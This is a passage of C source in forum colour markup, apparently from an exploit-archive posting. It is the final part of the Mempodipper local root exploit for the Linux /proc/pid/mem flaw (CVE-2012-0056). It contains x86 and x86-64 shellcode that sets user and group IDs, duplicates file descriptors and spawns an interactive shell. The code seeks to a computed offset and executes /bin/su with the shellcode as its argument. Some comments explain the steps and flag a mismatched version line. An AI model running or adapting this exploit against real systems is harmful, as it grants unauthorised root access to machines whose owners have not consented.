[/COLOR][COLOR=#0000BB]unsigned long offset [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]- [/COLOR][COLOR=#0000BB]su_padding[/COLOR][COLOR=#007700]();
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Seeking to offset 0x%lx.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]offset[/COLOR][COLOR=#007700]);
/* File position survives the exec; the first stderr write lands at `offset`. */
[/COLOR][COLOR=#0000BB]lseek64[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]offset[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]SEEK_SET[/COLOR][COLOR=#007700]);
/* Payload bytes are handed to su verbatim as argv[1].  The referenced
 * shellcode-32.s / shellcode-64.s sources are not part of this paste. */
[/COLOR][COLOR=#FF8000]#if defined(__i386__)
// See shellcode-32.s in this package for the source.
[/COLOR][COLOR=#0000BB]char shellcode[/COLOR][COLOR=#007700][] =
[/COLOR][COLOR=#DD0000]"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#FF8000]#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
[/COLOR][COLOR=#0000BB]char shellcode[/COLOR][COLOR=#007700][] =
[/COLOR][COLOR=#DD0000]"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#FF8000]#else
#error "That platform is not supported."
#endif
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Executing su with shellcode.\n"[/COLOR][COLOR=#007700]);
/* Only returns if the exec fails; then falls through to `return 0`. */
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
} else {
/* Forked half: re-exec this binary in `-c` mode with the socket number as text. */
[/COLOR][COLOR=#0000BB]char sock[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]sprintf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"%d"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Executing child from child fork.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/proc/self/exe"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"-c"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
/*
 * main: entry point.
 *   <prog> -c SOCK      internal mode: run child() on socket fd SOCK
 *                       (spawned by parent() via /proc/self/exe).
 *   <prog> -o ADDRESS   use a manually supplied hex address.
 *   <prog>              resolve the address with find_address().
 *
 * Option parsing only inspects argv[1][0] and argv[1][1]; the atoi() /
 * strtoul() inputs are not validated.  Returns whatever child() or
 * parent() returns.
 *
 * NOTE(review): the banner below identifies this as zx2c4's Mempodipper
 * (Jan 21, 2012), consistent with the URL in the file header; the
 * header's "Found by Angel Injection" / "Version: 2.6.18-374" lines do
 * not match that banner, so treat the kernel version given there as
 * unverified and check the CVE-2012-0056 advisory for affected versions.
 */
[/COLOR][COLOR=#0000BB]int main[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int argc[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]char [/COLOR][COLOR=#007700]**[/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]prog_name [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]];
/* Internal re-exec path: no banner, straight into child(). */
if ([/COLOR][COLOR=#0000BB]argc [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'-' [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'c'[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]atoi[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]]));
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"===============================\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= Mempodipper =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= by zx2c4 =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= Jan 21, 2012 =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"===============================\n\n"[/COLOR][COLOR=#007700]);
/* Manual address (hex, unvalidated) vs. automatic resolution. */
if ([/COLOR][COLOR=#0000BB]argc [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'-' [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'o'[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]strtoul[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]16[/COLOR][COLOR=#007700]));
else
return [/COLOR][COLOR=#0000BB]parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]find_address[/COLOR][COLOR=#007700]());
}
[/COLOR][COLOR=#FF8000]# 1337day.com [2012-06-29] [/COLOR][/COLOR]